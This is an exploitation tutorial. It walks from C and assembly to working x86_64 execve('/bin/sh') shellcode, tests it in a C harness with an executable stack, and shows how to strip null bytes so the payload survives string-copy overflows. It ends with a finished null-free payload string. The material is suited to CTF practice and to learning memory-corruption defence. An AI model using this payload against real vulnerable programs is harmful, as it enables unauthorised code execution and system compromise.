Write your shellcode
This memo describes how to write (and test) shellcode starting from the corresponding C code.
x86_64 Shellcode
The shellcode will start /bin/sh. Let’s take the following C code :
#include <unistd.h>
int main(void){
execve("/bin/sh", NULL, NULL);
}
The two NULL parameters stand for args and environment; we don't need them for now.
It can be translated into assembly this way:
global _start
SECTION .text
_start:
xor rdx,rdx ; env
xor rsi,rsi ; args
mov rax, 0x68732f6e69622f ; "/bin/sh"
push rax
mov rdi,rsp
mov rax, 0x3b ; sys_execve (59)
syscall
; Quit (only reached if execve fails)
xor rdi,rdi ; return code 0
mov rax,60 ; sys_exit (60) in the x86_64 syscall table
syscall
Explanation of the assembly code
Like the C function, the execve syscall takes 3 arguments. Here we don't call the C function execve() but invoke the syscall directly, which expects its parameters in the following registers:
Register | Value |
---|---|
rdi | File name to execute |
rsi | args |
rdx | env |
(see: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ for details)
Both args and env are NULL, so the two registers are set to zero:
xor rdx,rdx ; env
xor rsi,rsi ; args
Unlike a C program, shellcode can't rely on a data section to store its strings, so we have to build them on the stack:
- Put the string into a register
- Push the value of the register on the stack
- The string address is the current value of RSP (top of stack).
mov rax, 0x68732f6e69622f ; "/bin/sh" ( "hs/nib/")
push rax
mov rdi,rsp
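The constant loaded into rax can be derived rather than typed by hand. The following Python sketch (the helper name pack_string is made up for this illustration) packs "/bin/sh" plus its terminating null byte into a little-endian 64-bit integer, which is the value the mov instruction places in rax:

```python
def pack_string(text: str) -> int:
    """Pack up to 7 ASCII characters plus a null terminator into a 64-bit value."""
    raw = text.encode("ascii") + b"\x00"
    if len(raw) > 8:
        raise ValueError("string does not fit in one 64-bit register")
    # Pad to 8 bytes; x86_64 is little-endian, so the first character
    # ends up in the lowest byte of the register.
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


value = pack_string("/bin/sh")
print(hex(value))  # 0x68732f6e69622f
```

Read from the most significant byte down, the hex digits spell "hs/nib/", which is why the string looks reversed in the assembly source.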
Finally execute the syscall :
mov rax, 0x3b ; sys_execve (59)
syscall
Compilation :
$ nasm -felf64 -o shell.o shell.asm
$ ld -o shell shell.o
We can now extract the machine code with objdump (or any other disassembler):
$ objdump -d -Mintel shell
The interesting part is :
401000: 48 31 d2 xor rdx,rdx
401003: 48 31 f6 xor rsi,rsi
401006: 48 b8 2f 62 69 6e 2f movabs rax,0x68732f6e69622f
40100d: 73 68 00
401010: 50 push rax
401011: 48 89 e7 mov rdi,rsp
401014: b8 3b 00 00 00 mov eax,0x3b
401019: 0f 05 syscall
The corresponding machine-code bytes are:
48 31 d2 48 31 f6 48 b8 2f 62 69 6e 2f 73 68 00 50 48 89 e7 b8 3b 00 00 00 0f 05
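Turning these bytes into a C or Python string literal by hand is error-prone. A minimal Python sketch, assuming the bytes were copied as space-separated hex (to_escaped is a hypothetical helper name, not part of any tool):

```python
HEX_DUMP = (
    "48 31 d2 48 31 f6 48 b8 2f 62 69 6e 2f 73 68 00 "
    "50 48 89 e7 b8 3b 00 00 00 0f 05"
)


def to_escaped(hex_dump: str) -> str:
    """Convert space-separated hex bytes into a \\xNN escaped string."""
    raw = bytes.fromhex(hex_dump)  # spaces between byte pairs are ignored
    return "".join(f"\\x{byte:02x}" for byte in raw)


print(to_escaped(HEX_DUMP))
print(len(bytes.fromhex(HEX_DUMP)), "bytes")
```

The printed string can be pasted between double quotes in a C source file or after a b prefix in Python.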
Test the shellcode
With a little C program, we can test this shellcode:
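#include <stdio.h>
#include <string.h>
int main(void)
{
    /* Local array, so the bytes live on the stack: on recent Linux kernels,
       -z execstack makes only the stack executable, not global data. */
    char code[] = "\x48\x31\xd2\x48\x31\xf6\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x50\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05";
    /* Could also be written : char code[] = { 0x48, 0x31 ....} */
    /* Cast the buffer to a function pointer and call it. */
    (*(void(*)()) code)();
    return 0;
}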
Compilation :
gcc -o shelltest shelltest.c -z execstack
-z execstack is needed because gcc marks the stack as non-executable by default. We can check this with readelf:
$ gcc -o shelltest shelltest.c
$ readelf -a shelltest | grep STACK -A 1
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
$ ./shelltest
Segmentation fault (core dumped)
With -z execstack, the flags become RWE, for read/write/EXECUTE:
$ gcc -o shelltest shelltest.c -z execstack
$ readelf -a shelltest | grep STACK -A 1
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RWE 0x10
Without the flag, the segment is RW only.
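The same check can be scripted without readelf. The sketch below reads the program headers of a 64-bit little-endian ELF image and reports the flags of the GNU_STACK segment. The function name gnu_stack_flags is an assumption of this example; the constants come from the ELF format (PT_GNU_STACK = 0x6474e551, PF_X = 1, PF_W = 2, PF_R = 4).

```python
import struct

PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def gnu_stack_flags(elf: bytes):
    """Return 'RW', 'RWE', ... for the GNU_STACK segment, or None if absent."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF image")
    # ELF64 header: e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38.
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for index in range(e_phnum):
        # Each ELF64 program header starts with p_type then p_flags.
        p_type, p_flags = struct.unpack_from(
            "<II", elf, e_phoff + index * e_phentsize
        )
        if p_type == PT_GNU_STACK:
            return "".join(
                letter
                for bit, letter in ((PF_R, "R"), (PF_W, "W"), (PF_X, "E"))
                if p_flags & bit
            )
    return None
```

Called on the contents of the test binary, for instance gnu_stack_flags(open("shelltest", "rb").read()), it should return the same RW or RWE value that readelf prints.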
You now have working shellcode.
Polymorphism
In computer terminology, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact. That is, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. For example, 1+3 and 6-2 both achieve the same result while using different values and operations. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence.
https://en.wikipedia.org/wiki/Polymorphic_code
Why do I need polymorphism?
In some cases, we can't use \x00 in shellcode because it is processed by string-related functions (like strcpy, which stops copying at the first \x00 it encounters). In CTF exercises, other bytes are sometimes forbidden as well, and we need to get rid of them.
To remove unwanted bytes, we have to manipulate the assembly code, replace opcodes with others, remove some, add some. Here is an example.
Example
Take the shellcode from the first part of this article: it contains zeros and will not be processed correctly by a string-related function.
48 31 d2 48 31 f6 48 b8 2f 62 69 6e 2f 73 68 00 50 48 89 e7 b8 3b 00 00 00 0f 05
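To see where the problem bytes are, and what a strcpy-like function would actually copy, a short Python sketch can help (find_bad_bytes is a hypothetical helper; its default forbidden set contains only \x00):

```python
SHELLCODE = bytes.fromhex(
    "48 31 d2 48 31 f6 48 b8 2f 62 69 6e 2f 73 68 00"
    " 50 48 89 e7 b8 3b 00 00 00 0f 05"
)


def find_bad_bytes(code: bytes, forbidden: bytes = b"\x00") -> list:
    """Return the offsets of every forbidden byte found in code."""
    return [offset for offset, byte in enumerate(code) if byte in forbidden]


print(find_bad_bytes(SHELLCODE))  # [15, 22, 23, 24]

# strcpy stops at the first null byte, so only this prefix would be copied.
copied = SHELLCODE.split(b"\x00", 1)[0]
print(len(copied), "of", len(SHELLCODE), "bytes survive a strcpy")
```

Passing another forbidden set, for example b"\x00\x0a", covers exercises that also reject newlines.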
The first \x00 is at the end of the string:
401006: 48 b8 2f 62 69 6e 2f movabs rax,0x68732f6e69622f
40100d: 73 68 00
The string needs its terminating null byte in memory, but that byte must not appear in the instruction bytes. One way to achieve this is to store the negated (two's complement) value in the code and negate it again at run time with neg:
Current RAX is 0x68732f6e69622f
If we apply the neg operation, it becomes 0xff978cd091969dd1
...
mov rax, 0x68732f6e69622f
neg rax
<breakpoint here>
...
(gdb) info registers
rax 0xff978cd091969dd1 -29400045130965551
There are no zero bytes in 0xff978cd091969dd1.
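The negated constant does not have to come from a debugger session. As a sketch, the same two's-complement negation can be computed in Python by masking the result to 64 bits (neg64 is a name chosen for this example):

```python
MASK64 = (1 << 64) - 1


def neg64(value: int) -> int:
    """Emulate the x86_64 neg instruction on a 64-bit register."""
    return (-value) & MASK64


plain = 0x68732F6E69622F  # "/bin/sh" followed by a null byte
encoded = neg64(plain)

print(hex(encoded))                              # 0xff978cd091969dd1
print(b"\x00" in encoded.to_bytes(8, "little"))  # False
print(hex(neg64(encoded)))                       # 0x68732f6e69622f
```

The trick only helps when the negated value itself contains no forbidden byte; for another string, a different reversible operation may be needed.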
New shellcode :
401000: 48 31 d2 xor rdx,rdx
401003: 48 31 f6 xor rsi,rsi
401006: 48 b8 d1 9d 96 91 d0 movabs rax,0xff978cd091969dd1
40100d: 8c 97 ff
401010: 48 f7 d8 neg rax
401013: 50 push rax
401014: 48 89 e7 mov rdi,rsp
401017: b8 3b 00 00 00 mov eax,0x3b
40101c: 0f 05 syscall
There are still zeros in the mov eax,0x3b instruction, because the value is encoded as a 32-bit immediate (3b 00 00 00).
Instead of mov, we can use other instructions. First set rax to zero, then add 0x3b (the syscall number):
xor rax,rax
add rax,0x3b
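The difference comes from the immediate size each instruction encodes. The Python sketch below rebuilds both encodings by hand to make the padding visible; the opcode bytes are taken from the objdump output in this article, not generated by an assembler:

```python
import struct

SYS_EXECVE = 0x3B

# mov eax, imm32: opcode b8 followed by a 4-byte little-endian immediate.
mov_eax = b"\xb8" + struct.pack("<I", SYS_EXECVE)

# xor rax, rax (48 31 c0), then add rax, imm8 (48 83 c0 + 1-byte immediate).
xor_add = b"\x48\x31\xc0" + b"\x48\x83\xc0" + struct.pack("<b", SYS_EXECVE)

print(mov_eax.hex(" "))  # b8 3b 00 00 00
print(xor_add.hex(" "))  # 48 31 c0 48 83 c0 3b
```

The 8-bit immediate is sign-extended, so this form works for values up to 0x7f, which covers the execve syscall number.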
Let’s check the final code :
0000000000401000 <_start>:
401000: 48 31 d2 xor rdx,rdx
401003: 48 31 f6 xor rsi,rsi
401006: 48 b8 d1 9d 96 91 d0 movabs rax,0xff978cd091969dd1
40100d: 8c 97 ff
401010: 48 f7 d8 neg rax
401013: 50 push rax
401014: 48 89 e7 mov rdi,rsp
401017: 48 31 c0 xor rax,rax
40101a: 48 83 c0 3b add rax,0x3b
40101e: 0f 05 syscall
48 31 d2 48 31 f6 48 b8 d1 9d 96 91 d0 8c 97 ff 48 f7 d8 50 48 89 e7 48 31 c0 48 83 c0 3b 0f 05
It's done, no more zeros! You can use similar methods (and create your own) to remove any unwanted bytes. The better you know assembly language, the easier it is to write shellcode and apply polymorphism.
Here's the Python-usable version:
\x48\x31\xd2\x48\x31\xf6\x48\xb8\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xd8\x50\x48\x89\xe7\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05
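As a last sanity check before using the payload, the string can be pasted into Python as a bytes literal. This sketch assumes the layout shown in the final listing (the 8-byte movabs immediate starts at offset 8). It confirms that no null byte remains and that negating the immediate gives back the original string:

```python
shellcode = (
    b"\x48\x31\xd2\x48\x31\xf6\x48\xb8\xd1\x9d\x96\x91\xd0\x8c\x97\xff"
    b"\x48\xf7\xd8\x50\x48\x89\xe7\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
)

print(len(shellcode), "bytes, null-free:", b"\x00" not in shellcode)

# Bytes 8..15 hold the movabs immediate; undo the neg to recover the string.
immediate = int.from_bytes(shellcode[8:16], "little")
decoded = ((-immediate) & (2**64 - 1)).to_bytes(8, "little")
print(decoded)  # b'/bin/sh\x00'
```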